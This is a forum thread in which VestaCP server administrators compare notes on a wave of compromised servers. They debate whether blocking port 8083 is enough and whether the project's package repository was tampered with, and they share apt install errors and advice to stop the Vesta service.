Got 10 VestaCP servers exploited

[kobo1d]

or limit access to port 8083 using firewall

no thats not working. i got infected while this port was only available to my ip !!

Are you sure? I thought this was all about 8083 being publicly available?

doesnt matter. do a

Code: Select all

service vesta stop

until the update of vestacp is working again.
blocking the port wont help you, i got hacked with closed port.

[RevengeFNF]

no thats not working. i got infected while this port was only available to my ip !!

Are you sure? I thought this was all about 8083 being publicly available?

doesnt matter. do a

Code: Select all

service vesta stop

until the update of vestacp is working again.
blocking the port wont help you, i got hacked with closed port.

How did you got hacked if the port was closed? With the port closed, there is not access to the Web UI.

If that is true, the only way iam seeing it, is that Vesta repositories were hacked and people installed an exploited version of Vesta.

When did you installed your VestaCP?

[kobo1d]

How did you got hacked if the port was closed? With the port closed, there is not access to the Web UI.

If that is true, the only way iam seeing it, is that Vesta repositories were hacked and people installed an exploited version of Vesta.

When did you installed your VestaCP?

yes thats how the hack is working. it is installed hidden and leaves no logs on the server. (via rep)
i have rkhunter, chkrootkit, clamav, iptables, fail2ban and aide.
none of them reacted so it was installed internally and got by every of the security mechanism.
i installed vesta about 10 days ago on this brand new fresh server.
its ssh secure by pubkey, no root login allowed
vesta webui forced to listen to my ip only (tested and working)
parent id of virus was 1 (systemd)

ALSO i get email on ssh logins. no mails were sent during this time.

and i guess thats why their rep is down now and you cant update currently

[pipoy]

or limit access to port 8083 using firewall

no thats not working. i got infected while this port was only available to my ip !!

Are you sure? I thought this was all about 8083 being publicly available?

I have a different port. Was hacked

[blackyangell]

I have just tried to make a new vesta server on Digital Ocean, Ubuntu 16 and got these errors during install.

Hit:1 http://apt.vestacp.com/xenial xenial InRelease
Hit:2 http://security.ubuntu.com/ubuntu xenial-security InRelease
Hit:3 https://repos.sonar.digitalocean.com/apt main InRelease
Hit:4 http://nginx.org/packages/mainline/ubuntu xenial InRelease
Hit:5 http://nyc2.mirrors.digitalocean.com/ubuntu xenial InRelease
Hit:6 http://nyc2.mirrors.digitalocean.com/ubuntu xenial-updates InRelease
Hit:7 http://nyc2.mirrors.digitalocean.com/ubuntu xenial-backports InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package vesta-php
E: Unable to locate package vesta-ioncube
E: Unable to locate package vesta-softaculous
Error: apt-get install failed

Do you think it has to do with this hack or the patch released?

Does anybody know some workaround for this?
Have the same problem on DigitalOcean, Ubuntu.

[kobo1d]

I have just tried to make a new vesta server on Digital Ocean, Ubuntu 16 and got these errors during install.

Hit:1 http://apt.vestacp.com/xenial xenial InRelease
Hit:2 http://security.ubuntu.com/ubuntu xenial-security InRelease
Hit:3 https://repos.sonar.digitalocean.com/apt main InRelease
Hit:4 http://nginx.org/packages/mainline/ubuntu xenial InRelease
Hit:5 http://nyc2.mirrors.digitalocean.com/ubuntu xenial InRelease
Hit:6 http://nyc2.mirrors.digitalocean.com/ubuntu xenial-updates InRelease
Hit:7 http://nyc2.mirrors.digitalocean.com/ubuntu xenial-backports InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package vesta-php
E: Unable to locate package vesta-ioncube
E: Unable to locate package vesta-softaculous
Error: apt-get install failed

Do you think it has to do with this hack or the patch released?

Does anybody know some workaround for this?
Have the same problem on DigitalOcean, Ubuntu.

wait until the fixed their rep. its down casuse the virus was spread from over there

[Falzo]

blocking the port wont help you, i got hacked with closed port.

how certain of that are you? while it's true that the default policy is DROP, did you actually CHECK if the change to that rule got reflected by iptables and really blocked access from foreign IPs?

so far you are the only one to be hacked with claiming to have had that port closed/whitelisted. no offense meant, but a single occurance could also point to a flaw in your setup/firewall ;-)

[kobo1d]

blocking the port wont help you, i got hacked with closed port.

how certain of that are you? while it's true that the default policy is DROP, did you actually CHECK if the change to that rule got reflected by iptables and really blocked access from foreign IPs?

so far you are the only one to be hacked with claiming to have had that port closed/whitelisted. no offense meant, but a single occurance could also point to a flaw in your setup/firewall ;-)

you dont need to believe me. read my previous post: viewtopic.php?f=10&t=16556&start=320#p69046

you will see that i am right when vestacp posts public news about what was happening with their rep.

[ebota]

DigitalOcean published and advice and blocked the default port

https://www.digitalocean.com/community/ ... l-8th-2018

[Falzo]

blocking the port wont help you, i got hacked with closed port.

how certain of that are you? while it's true that the default policy is DROP, did you actually CHECK if the change to that rule got reflected by iptables and really blocked access from foreign IPs?

so far you are the only one to be hacked with claiming to have had that port closed/whitelisted. no offense meant, but a single occurance could also point to a flaw in your setup/firewall ;-)

you dont need to believe me. read my previous post: viewtopic.php?f=10&t=16556&start=320#p69046

you will see that i am right when vestacp posts public news about what was happening with their rep.

will see about that. I have a server (debian 9) freshly installed with vesta on april 2nd, port 8083 opened, which wasn't hit nor affected at all. I haven't updated yet, feel free to give pointers for what i should look and you think the attacking vector would be.

if there is something inside the sources which got spread through the repo it still would need to be activated somehow... may it be by a timer or external call.
with the port blocked/whitelisted an external is unlikely, so you'd bet on internal crons being manipulated or something like that?

as said I am willing to dig deeper, as I have quite some installations of vesta, only two were affected, just give some more input what you think would be worth to look out for.